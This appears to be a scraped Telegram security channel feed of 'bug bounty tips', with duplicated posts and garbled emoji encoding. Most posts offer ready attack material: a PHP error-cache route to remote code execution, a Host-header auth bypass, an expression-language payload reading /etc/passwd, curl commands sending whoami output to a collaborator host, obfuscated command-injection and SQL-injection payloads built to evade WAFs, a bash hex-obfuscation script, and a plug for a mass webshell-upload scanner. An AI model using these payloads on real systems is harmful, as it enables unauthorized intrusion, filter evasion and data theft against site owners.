π°οΈ Discover IPING β Your Go-To IP Intelligence Tool
π‘ IPING helps you uncover whatβs behind any IP address in seconds.
π From location and ASN to proxy status and risk level β all the insights you need for smarter investigations or secure online operations. No sign-up, no limits, only accurate results.
π Explore now: https://www.iping.cc/
π‘ IPING helps you uncover whatβs behind any IP address in seconds.
π From location and ASN to proxy status and risk level β all the insights you need for smarter investigations or secure online operations. No sign-up, no limits, only accurate results.
π Explore now: https://www.iping.cc/
β€5π₯3
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯16β€6π1
Hey Hunter,
what do you think Web Cache to RCE possible or not?
Yes! Itβs really very intresting, Post coming Soon.
what do you think Web Cache to RCE possible or not?
Yes! Itβs really very intresting, Post coming Soon.
π±20π«‘6β€5
Hey Hunter's,
Darkshadow here back again, dropping a really very interesting Method.
πWeb cache to RCE!π
While i normally visit the web application i noticed, the website actively makes cache file from clint side to store errors.
Now The idea is, if we able to make any custom error then it will be cached, and if any how the error execute on the system we might see the output.
β Exploit to reproduce final RCE:
1. The webapp was sending request from client side in a array based parameter.
2. Change the valid Input to a PHP code using system function. Here we just try to making a error using the invalid input.
3. Now the web application is not able to handle this input and makes error and store in a cache file.
4. After visiting the cache file, The error message reflecting on the cache file.
5. But wait, it's also execute my PHP code and store the command output in the file. Means we can execute OS commands output in cache file via making error. Means RCE!
Follow me for more methods x.com/darkshadow2bd
Darkshadow here back again, dropping a really very interesting Method.
πWeb cache to RCE!π
While i normally visit the web application i noticed, the website actively makes cache file from clint side to store errors.
Now The idea is, if we able to make any custom error then it will be cached, and if any how the error execute on the system we might see the output.
β Exploit to reproduce final RCE:
1. The webapp was sending request from client side in a array based parameter.
2. Change the valid Input to a PHP code using system function. Here we just try to making a error using the invalid input.
3. Now the web application is not able to handle this input and makes error and store in a cache file.
4. After visiting the cache file, The error message reflecting on the cache file.
5. But wait, it's also execute my PHP code and store the command output in the file. Means we can execute OS commands output in cache file via making error. Means RCE!
Follow me for more methods x.com/darkshadow2bd
π₯20πΏ8π±4π2β€1π’1
Hey Hunter's,
DarkShadow here back again, dropping a another interesting method!
πAuth bypass using Host Headerβ
β Step to Reproduce:
1. Open target in BurpSuite, and simply visit as possible deeper.
2. Filter all JS script files.
3. Figure out any sensitive path as well any Admin dashboard path.
4. Send request on the path via changing Host Header to localhost.
It's looks very simple guy's but still very impactful. Always add this technique in your checklist.
And also add me in your follow listπ
x.com/darkshadow2bd
#bugbountytips #authbypass
DarkShadow here back again, dropping a another interesting method!
πAuth bypass using Host Headerβ
Guy's This is most easiest and simple way to find most critical bug.
β Step to Reproduce:
1. Open target in BurpSuite, and simply visit as possible deeper.
2. Filter all JS script files.
3. Figure out any sensitive path as well any Admin dashboard path.
4. Send request on the path via changing Host Header to localhost.
It's looks very simple guy's but still very impactful. Always add this technique in your checklist.
And also add me in your follow listπ
x.com/darkshadow2bd
#bugbountytips #authbypass
1π₯18β€9π2π€¨2π1π€1
Hey Hunterβs,
DarkShadow here back again, dropping another easiest way to get critical bugs!
If You Ever See Language Parameter, Then Never Forget to Test Expression-Language Injection Style Payload.
β POC Payload:
If you guyβs are really enjoy to read then show your love.
#bugbountytips #rce
DarkShadow here back again, dropping another easiest way to get critical bugs!
If You Ever See Language Parameter, Then Never Forget to Test Expression-Language Injection Style Payload.
β POC Payload:
1. Change the Method GET to POST
2. Language={${system("cat+/etc/passwd")}}
If you guyβs are really enjoy to read then show your love.
#bugbountytips #rce
1π₯27β€9π5
Guys wanna see a very interesting blind RCE?
1π₯25π10
Hey Hunterβs,
DarkShadow here back again!
β οΈBlind Remote Code Executionπ₯
β POC: [Preferred format]
curl -X POST -d \"user=$(whoami)\" https://BURP_LINK"
Others format you might try:
curl
curl $(whoami).BURP_LINK
some time targets might vulnerable but not give you the output. so never forget to try your burp collaborator to get the output.
NOTICE: always check
Now you hit follow me for more: x.com/darkshadow2bd
DarkShadow here back again!
β οΈBlind Remote Code Executionπ₯
β POC: [Preferred format]
curl -X POST -d \"user=$(whoami)\" https://BURP_LINK"
Others format you might try:
curl
whoami.BURP_LINKcurl $(whoami).BURP_LINK
some time targets might vulnerable but not give you the output. so never forget to try your burp collaborator to get the output.
NOTICE: always check
User-Agent Header in your burp collaborator responds, if here you got curl means RCE.Now you hit follow me for more: x.com/darkshadow2bd
1π₯24β€6πΏ6π3
Hey Hunter's,
DarkShadow here back again, dropping some bypass methods that definitely help you.
Trying OS command injection, but WAF blocks every times?
β cat /etc/hosts
β tac /e\t\c/h\o\s\t\s
β tac${IFS}/e\t\c/h\o\s\t\s
β tac /e*c/h*st*
β tac /e{t,c}*/{o,h}*s*{s,t}
β tac /??c/??sts
Let me know guy's you all wants more or not like that?
DarkShadow here back again, dropping some bypass methods that definitely help you.
Trying OS command injection, but WAF blocks every times?
β cat /etc/hosts
β tac /e\t\c/h\o\s\t\s
β tac${IFS}/e\t\c/h\o\s\t\s
β tac /e*c/h*st*
β tac /e{t,c}*/{o,h}*s*{s,t}
β tac /??c/??sts
Let me know guy's you all wants more or not like that?
1β€14π±11π₯6π2
Brut Security
Hey Hunter's, DarkShadow here back again, dropping some bypass methods that definitely help you. Trying OS command injection, but WAF blocks every times? β cat /etc/hosts β
tac /e\t\c/h\o\s\t\s β
tac${IFS}/e\t\c/h\o\s\t\s β
tac /e*c/h*st* β
tac /e{t,c}*/{oβ¦
This is for copy cats who copy my posts and share without cradit:
~DarkShadow
Hey copy cats, stop copying my posts and do your self. If you don't think deeply then first learn deeply.
~DarkShadow
1π€9β€5π«‘4π₯2πΏ2
π¨Multi-target unauthenticated RCE scanner for CVE-2025-34085 affecting WordPress Simple File List plugin. Uploads, renames, and triggers PHP webshells across large target sets.
β https://github.com/ill-deed/CVE-2025-34085-Multi-target
β https://github.com/ill-deed/CVE-2025-34085-Multi-target
π5
Check out this job at National Cyber Security Services: https://www.linkedin.com/jobs/view/4340448773
Linkedin
National Cyber Security Services hiring Security monitoring & incident response in Kolkata, West Bengal, India | LinkedIn
Posted 8:21:00 AM. SIEM Engineer (Open-Source & Enterprise) β SOC Deployment & TuningWeβre looking for a SIEM Engineerβ¦See this and similar jobs on LinkedIn.
β€4
Hey Hunter's,
DarkShadow here back again, dropping a really interesting bypass method!
βWAF block: whoami
β WAF bypass: $'\x77\x68\x6f\x61\x6d\x69'
β¨Bash script:
Guy's using my this dark-hex script you can directly execute obfuscate commands in bash!
#bugbountytips #bypass
DarkShadow here back again, dropping a really interesting bypass method!
βWAF block: whoami
β WAF bypass: $'\x77\x68\x6f\x61\x6d\x69'
β¨Bash script:
#!/bin/bash
str="$1"
out=""
for ((i=0; i<${#str}; i++)); do
char="${str:i:1}"
ascii=$(printf '%d' "'$char")
hex=$(printf '%02x' "$ascii")
out="${out}\\x${hex}"
done
echo "$'$out'"
Guy's using my this dark-hex script you can directly execute obfuscate commands in bash!
#bugbountytips #bypass
π«‘18π₯7β€5
β‘οΈOutdated but Helpful Some MySQL tricks to break some #WAFs out there. βοΈ by @BRuteLogic
#infosec #cybersec #bugbountytips
SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`#infosec #cybersec #bugbountytips
β€11
Hey Hunterβs,
DarkShadow is here back again!
Before Testing Complex RCE Payloads, SomeTimes You Need to Think Simple.
ππ»Like:
parameter=value id
Now Guys simply show your love β€οΈ
#bugbountytips #rce
DarkShadow is here back again!
Before Testing Complex RCE Payloads, SomeTimes You Need to Think Simple.
ππ»Like:
parameter=value id
Now Guys simply show your love β€οΈ
#bugbountytips #rce
β€20π₯7
π‘οΈ Bug Bounty Tip: Cloudflare 403 Bypass for Time-Based Blind SQLi
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
β Blocked Payload
β Bypass Payload
π This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
β Credit: @nav1n0x
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
β Blocked Payload
(select(0)from(select(sleep(10)))v) β 403 Forbidden
β Bypass Payload
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)
π This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
β Credit: @nav1n0x
1β€11π2